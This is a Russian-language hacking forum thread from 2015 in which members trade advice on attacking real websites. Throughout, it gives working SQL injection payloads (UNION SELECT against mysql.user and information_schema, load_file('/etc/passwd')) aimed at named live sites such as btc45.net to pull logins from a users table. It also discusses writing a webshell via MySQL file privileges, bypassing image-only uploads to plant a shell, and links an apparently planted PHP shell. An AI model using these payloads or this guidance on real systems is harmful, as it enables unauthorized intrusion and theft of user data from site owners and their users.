Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ошибка та же? вы уверены, что есть доступ к таблице mysql? проще проверить функцией load_file()
     
    _________________________
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Сначала проверь, есть ли доступ к mysql.user
    union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user
     
    _________________________
  3. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    вот
    Code:
    ja-zdorov.com/images/php.php
     
  4. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--
    пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    запрос:
    Code:
    SELECT 1 FROM mysql.user;
    наличие доступа к бд mysql или наоборот, отсутствие, не говорит о том, что у пользователя нет file_priv. еще раз говорю, попробуйте load_file('/etc/passwd'). в вашем случае /etc/passwd надо заенкодить в hex.

    отправьте доступ в лс, посмотрю :)
     
    _________________________
    #23845 yarbabin, 8 Feb 2015
    Last edited: 8 Feb 2015
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Значит нет доступа.
     
    _________________________
  7. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Подскажите,как вытащить есть таблица [users] стобцы из неё я могу прочитать,но вот дальше никак, таблица в квадратных скобках
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    SELECT 1,2,3,4,5 FROM `[users]`-- 
     
    _________________________
  9. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1

    )) уже по разному пробовала,не хочет
    http://bt c45.net/forum.php?sub=166 union select 1,2,3,4,TABLE_NAME,6,7 FROM INFORMATION_SCHEMA.TABLES LIMIT 98,1

    кавычки фильтруются
     
    #23849 madam, 9 Feb 2015
    Last edited: 9 Feb 2015
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    колонки:
    Code:
    http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,column_NAME,6,7+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x5b75736572735d
    записи из таблицы:
    Code:
    http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,login,6,7+FROM+`[users]`+limit+4,1
    что именно он не хочет?
     
    _________________________
  11. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1

    блин,всё поняла кавычки не те поставила (( спасиб
     
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть админка, но запрещено заливать файлы .php только изображение, как можно залить шелл. Проинклудить не получается.
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Что можно с этим сделать?
    http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=bdd49c98329a5db8044c192d4033f887&tx_artbase[__referrer][extensionName]=Artbase&tx_artbase[__referrer][controllerName]=Search&tx_artbase[__referrer][actionName]=showSearchForm&tx_artbase[__hmac]=a:3:{s:11:%22searchfield%22;i:1;s:6:%22action%22;i:1;s:10:%22controller%22;i:1;}5165223b6f84dec570ccfd7b1d7a2f1958787a14&tx_artbase[searchfield]=a?

    урезал лишнее
    http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig
     
    #23853 DezMond™, 10 Feb 2015
    Last edited: 10 Feb 2015
  14. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    сайт на вп, есть рут бд, file_priv Y , админка заблочена по ип, прочитать файлы могу, а вот заливка при файл прив не работает, путь раскрыл. перепробовал все папки вп
    выдет ерор 13 cant create\write
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    в /tmp льется?
     
    _________________________
  16. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая
     
  17. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Скорее всего при конфигурации не задана tmp директория. Ничего не поделать.
     
  18. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    я наверное чегото не понимаю, а причем тут tmp , когда я пробую литься в другие дериктории
     
  19. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    http://www.cyberciti.biz/faq/mysqld-innodb-error-unable-to-create-temporary-file/
    Файлы же льются не прямо в директорию(host ->dir), а host -> tmp ->dir.
     
  20. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    452
    Likes Received:
    265
    Reputations:
    40
    Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта? :)
     
    1 person likes this.
Thread Status:
Not open for further replies.